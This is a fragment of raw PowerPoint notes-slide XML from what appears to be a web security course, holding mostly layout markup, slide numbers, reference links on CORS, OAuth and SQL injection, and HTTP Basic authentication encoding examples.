          <p:cNvPr id="75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4361D2-B621-7746-8265-C3B06653821F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>75</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58D087-0122-2746-9FC3-C2A7330CADF4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr 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5000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DC3B8A-EE89-7C47-B7C0-C226F7775C66}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr 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735627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C6A84-23F7-DB4F-A267-8CB26F0C6882}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="759810" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="759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099370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developer.mozilla.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-US/docs/Web/HTTP/CORS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3125540E-22BB-A04D-A531-AB9E834E7175}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32626140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0285D4-FC69-9348-9D2D-3AD36ADA09D4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="761858" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="761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FAE952-8895-434D-8E00-9502AA8622D0}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1094658" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1094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5E1E2B-F63C-2C41-81E1-C25C44D30C72}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="717826"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717827"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848B29-ECD6-A34D-B941-D09886CE1358}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="854018"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54019"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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15813038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723818-8AD7-7C43-8502-F6672AFC2A32}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="856066"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56067"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r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Aladdin:open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sesame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19352485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C47237-1273-EA4F-B311-B5C10B084F04}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="916482"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91648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4B0001-786D-6845-A045-DFA17A394474}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>104</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18961-A4A4-6B42-8EE5-EF67FC6CA2D9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>105</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AC257-451B-8342-8150-898979E9A024}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>106</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portswigger.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/web-security/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oauth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3125540E-22BB-A04D-A531-AB9E834E7175}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25511132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7529E-D42E-0F42-ABD9-4AE8E02D62B5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>109</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45DEBA-295D-774C-909A-90F1116C1DDD}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1100802" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110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47E7EE-EE9D-B14B-9D35-3EB9FCDEF16B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>111</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E167B-969D-804B-B75E-FD9386D0D2C5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="843778"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43779"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0DE3E0-C955-784C-B82B-B66490F7B03F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>112</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867815-A9CF-0B41-B174-DC804CED91CE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1103874" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1103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F7F156-632F-A849-B440-8E41B57E85F9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>114</a:t>
            </a:fld>
            <a:endParaRPr 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dmlnbmE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= = base64(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3125540E-22BB-A04D-A531-AB9E834E7175}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39669381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A2A1D-13E7-BA4A-9B91-541DB6ED33EC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="763906" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="763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2C0E0-1750-624A-A359-51067DC8F5CF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>123</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7EFC35-F2B7-5B4D-AF7F-8E35D85839BF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1108994" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1108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715738-DDC0-2F4B-AD5F-9EC62034D8DF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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C9148D-A001-7543-AA4C-B09D6B698CDC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>129</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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EEEB0-A6C0-9847-B140-E3F9F20575AC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>130</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B4BC35-7801-134A-AB9E-344F8BAC44AE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="845826"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45827"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69A75B-A855-7D46-890F-E6A31BAD959D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>131</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="768002" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76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9BB080-D5D2-8B4B-BEAF-D05D9FC80B43}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>132</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="769026" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76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2A6702-BF76-5647-B069-22A5C3584FC7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>139</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="939010"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93901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5D2D1-C1EE-7C4E-A09D-B505F3334DAE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>141</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="949250"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94925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9D74E5-98B7-C64D-93DB-39549CA035BA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>142</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56422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64227"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08AF7E-26EF-114E-B19A-421E085F11EC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>143</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566274"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66275"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B16841-BCC1-CB41-B16A-AD26C5A0F23F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>144</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56832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68323"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C704E5-B728-4E4A-BFBA-59E23E777030}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>145</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570370"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70371"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5E0C18-5CE8-9B4D-8AE0-D275A5AFE489}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>146</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572418"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72419"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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.sqlinjection.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/table-names/</a:t>
            </a:r>
          </a:p>
          <a:p>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5D9294-69AD-174C-A262-215582D89675}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>147</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="590850" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143001" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91433" tIns="45717" rIns="91433" bIns="45717" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="590851" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914401" y="4343401"/>
            <a:ext cx="5021263" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91426" tIns="45714" rIns="91426" bIns="45714" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>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547D22-0EAE-FE42-9F7A-C519BE1AC398}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="847874"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47875"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A779B-7DF6-0C44-BD65-5CC56C02206F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>148</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1141762" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143775" y="686427"/>
            <a:ext cx="4571999" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="89940" tIns="44970" rIns="89940" bIns="44970" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1141763" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914710" y="4343714"/>
            <a:ext cx="5020841" cy="4113862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91712" tIns="45856" rIns="91712" bIns="45856" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>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B501DA-FA05-8142-A73A-ABE0B0CB9927}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>149</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1143810" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143775" y="686427"/>
            <a:ext cx="4571999" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="89940" tIns="44970" rIns="89940" bIns="44970" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1143811" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914710" y="4343714"/>
            <a:ext cx="5020841" cy="4113862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91712" tIns="45856" rIns="91712" bIns="45856" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>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AC580F-28F2-1141-A702-78E4A0E8DF15}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>150</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145858" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143775" y="686427"/>
            <a:ext cx="4571999" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="89940" tIns="44970" rIns="89940" bIns="44970" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145859" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914710" y="4343714"/>
            <a:ext cx="5020841" cy="4113862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91712" tIns="45856" rIns="91712" bIns="45856" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://lakshmi993.medium.com/blind-sql-injection-mysql-data-base-d2f35afbc451</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859AE6-00BC-CC41-9EF4-D595E0B49F5A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>153</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592898" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143001" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91433" tIns="45717" rIns="91433" bIns="45717" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592899" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914401" y="4343401"/>
            <a:ext cx="5021263" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
